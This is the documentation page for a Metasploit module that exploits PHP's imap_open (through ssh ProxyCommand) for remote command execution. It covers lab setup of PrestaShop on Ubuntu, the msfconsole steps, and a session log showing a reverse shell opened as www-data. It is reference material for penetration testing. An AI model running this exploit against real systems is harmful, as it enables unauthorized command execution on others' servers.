## Vulnerable Application The [imap_open](http://php.net/manual/en/function.imap-open.php) function within php, if called without the `/norsh` flag, will attempt to preauthenticate an IMAP session. On Debian based systems, including Ubuntu, `rsh` is mapped to the ssh binary. Ssh's `ProxyCommand` option can be passed from `imap_open` to execute arbitrary commands. While many custom applications may use `imap_open`, it is reported that the following applications are vulnerable: * instantcms * HostCMS * e107_2 * prestashop * SuiteCRM * SugarCRM Prestashop exploitation requires the admin URI, and administrator credentials. ### Prestashop on Ubuntu 16.04 Mostly derived from [websiteforstudents.com](https://websiteforstudents.com/install-prestashop-on-ubuntu-17-04-17-10-with-apache2-mariadb-and-php/), with a few tweeks for Ubuntu 16.04, and to install PHP's imap mod. ``` sudo apt install apache2 sudo sed -i "s/Options Indexes FollowSymLinks/Options FollowSymLinks/" /etc/apache2/apache2.conf sudo systemctl stop apache2.service sudo systemctl start apache2.service sudo systemctl enable apache2.service sudo apt-get install mariadb-server mariadb-client sudo systemctl stop mysql.service sudo systemctl start mysql.service sudo systemctl enable mysql.service sudo mysql_secure_installation sudo systemctl restart mysql.service sudo apt install php libapache2-mod-php php-common php-mbstring php-xmlrpc php-soap php-gd php-xml php-intl php-mysql php-cli php-mcrypt php-ldap php-zip php-curl php-imap sudo phpenmod imap sudo mysql -u root -p ``` ``` CREATE USER 'prestashopuser'@'localhost' IDENTIFIED BY 'new_password_here'; GRANT ALL ON prestashop.* TO 'prestashopuser'@'localhost' IDENTIFIED BY 'user_password_here' WITH GRANT OPTION; FLUSH PRIVILEGES; EXIT; ``` ``` cd /tmp && curl -O https://download.prestashop.com/download/releases/prestashop_1.7.2.4.zip unzip prestashop_1.7.2.4.zip sudo mkdir -p /var/www/html/prestashop sudo unzip prestashop.zip -d /var/www/html/prestashop/ sudo chown -R www-data:www-data /var/www/html/prestashop/ sudo chmod -R 755 /var/www/html/prestashop/ sudo nano /etc/apache2/sites-available/prestashop.conf ``` Utilize the following configuration: ``` ServerAdmin admin@example.com DocumentRoot /var/www/html/prestashop/ ServerName example.com ServerAlias www.example.com Options +FollowSymlinks AllowOverride All Require all granted ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined ``` ``` sudo a2ensite prestashop.conf sudo a2enmod rewrite sudo a2dissite 000-default sudo systemctl restart apache2.service ``` Browse to the website, and install with default information. ``` sudo rm -rf /var/www/html/prestashop/install/ ``` Now browse to `/admin`, and the first time you'll be redirected to the admin URI. If not, `sudo ls /var/www/html/prestashop/admin*`. ## Verification Steps 1. Install a vulnerable application 2. Start msfconsole 3. Do: ```use exploit/linux/http/php_imap_open_rce``` 4. Do: ```set TARGETURI [URI]``` 5. Do: ```set USERNAME [username]``` 6. Do: ```set PASSWORD [password]``` 7. Do: ```set target [target]``` 8. Do: ```run``` 9. You should get a shell. ## Options **TARGETURI** The URI for the target. This may change by target. Default is ``. Prestashop should be the admin URI, similar to `/admin2769gx8k3`. ## Scenarios ### PrestaShop 1.7.2.4 on Ubuntu 16.04.4 with PHP 7.0 ``` resource (presta.rb)> use exploit/linux/http/php_imap_open_rce resource (presta.rb)> set TARGETURI /admin2769gx8k3 TARGETURI => /admin2769gx8k3 resource (presta.rb)> set USERNAME ubuntu@none.com USERNAME => ubuntu@none.com resource (presta.rb)> set PASSWORD ubuntuubuntu PASSWORD => ubuntuubuntu resource (presta.rb)> set rhosts 192.168.2.139 rhosts => 192.168.2.139 resource (presta.rb)> set verbose true verbose => true resource (presta.rb)> exploit [*] Started reverse TCP double handler on 192.168.2.117:4444 [*] Redirected to http://192.168.2.139/admin2769gx8k3/ [*] Redirected to http://192.168.2.139/admin2769gx8k3/index.php?controller=AdminLogin&token=6dab1f7b4eea17d2b44a8929ead9df68 [*] Token: 6dab1f7b4eea17d2b44a8929ead9df68 and Login Redirect: http://192.168.2.139/admin2769gx8k3/&token=09283f9efc45fc75eca3b8d5f1b1f92f [*] Logging in with ubuntu@none.com:ubuntuubuntu [*] Login JSON Response: {"hasErrors":false,"redirect":"http:\/\/192.168.2.139\/admin2769gx8k3\/index.php?controller=AdminDashboard&token=e324e8b387afb1874947db9b1ba411c8"} [+] Login Success, loading admin dashboard to pull tokens [*] Customer Threads Token: ec653c8bfc09754fc63aaa94101911dc [+] Sending Payload with Final Token: ec653c8bfc09754fc63aaa94101911dc [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo ivxULEW4eweTiis7; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket A [*] A: "ivxULEW4eweTiis7\r\n" [*] Matching... [*] B is input... [*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.139:41746) at 2018-11-18 21:08:50 -0500 uname -a Linux ubuntu1604 4.4.0-138-generic #164-Ubuntu SMP Tue Oct 2 17:16:02 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux whoami www-data id uid=33(www-data) gid=33(www-data) groups=33(www-data) ```